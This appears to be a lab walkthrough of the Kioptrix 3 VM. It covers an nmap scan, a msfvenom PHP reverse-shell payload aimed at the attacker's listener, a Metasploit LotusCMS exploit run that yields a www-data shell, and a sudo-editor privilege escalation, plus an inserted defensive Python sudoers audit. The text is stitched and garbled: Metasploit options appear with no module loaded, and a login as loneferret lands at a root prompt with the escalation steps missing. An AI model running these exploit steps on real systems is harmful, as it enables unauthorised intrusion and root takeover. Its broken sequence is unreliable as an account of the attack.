root@kali:~# nmap -A -sS -n 192.168.43.158
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT
Nmap scan report for 192.168.43.158
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.43.158

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
From the scan output we can see two open services:
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58
RHOST => 192.168.43.58
msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(multi/http/lcms_php_exec) > set URI /
URi => /
msf exploit(multi/http/lcms_php_exec) > show options

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.43.58    yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host

Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.58    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0

msf exploit(multi/http/lcms_php_exec) > run

[*] Started bind handler
[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158
RHOST => 192.168.43.158
msf exploit(multi/http/lcms_php_exec) > run

[*] Started bind handler
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400

whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
pwd
/home/www/kioptrix3.com
root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
The home directory contains a CompanyPolicy.README file.
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
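Added example, not part of the original walkthrough: a small Python audit that parses a sudoers file and flags rules which hand a user an interactive editor or pager (such as the ht editor this README mandates), because any editor run through sudo can open and write arbitrary files with root privileges. The sudoers text below and the list of risky programs are constructed for the demonstration, not taken from the VM.

```python
import os
import re

# Interactive editors/pagers that, once allowed via sudo, let the invoking user
# read or write any file as root. ht is the editor the README tells staff to use.
RISKY_PROGRAMS = {"ht", "vi", "vim", "nano", "less", "more", "ed"}

# Constructed sample sudoers content for this example (not copied from the VM).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root       ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
dreg       ALL=(ALL) /usr/bin/apt-get
"""

# user host = [(runas)] [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(\S+)\s+(\S+)\s*=\s*(?:\((.+?)\)\s*)?"
    r"((?:(?:NO)?(?:PASSWD|EXEC|SETENV):\s*)*)(.+)$"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

def parse_sudoers(text):
    """Return one dict per user specification line in a sudoers file."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, host, runas, tags, cmds = m.groups()
        rules.append({
            "user": user, "host": host, "runas": runas or "root",
            "nopasswd": "NOPASSWD:" in tags,
            "commands": [c.strip() for c in cmds.split(",")],
        })
    return rules

def risky_rules(text):
    """Return (user, command, nopasswd) for non-root rules granting ALL or a risky program."""
    findings = []
    for rule in parse_sudoers(text):
        if rule["user"] == "root":
            continue
        for cmd in rule["commands"]:
            if cmd.startswith("!"):                 # negated entry grants nothing
                continue
            prog = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or prog in RISKY_PROGRAMS:
                findings.append((rule["user"], cmd, rule["nopasswd"]))
    return findings
```

Running `risky_rules(SAMPLE_SUDOERS)` reports the loneferret/ht rule (and that it needs no password); the fix is to remove the editor from sudoers or restrict the user to `sudoedit` on the specific files they must maintain.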
root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password:
Last login: Tue May 8 19:27:01 2018 from uknow-pc
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)
root@Kioptrix3:~# whoami
root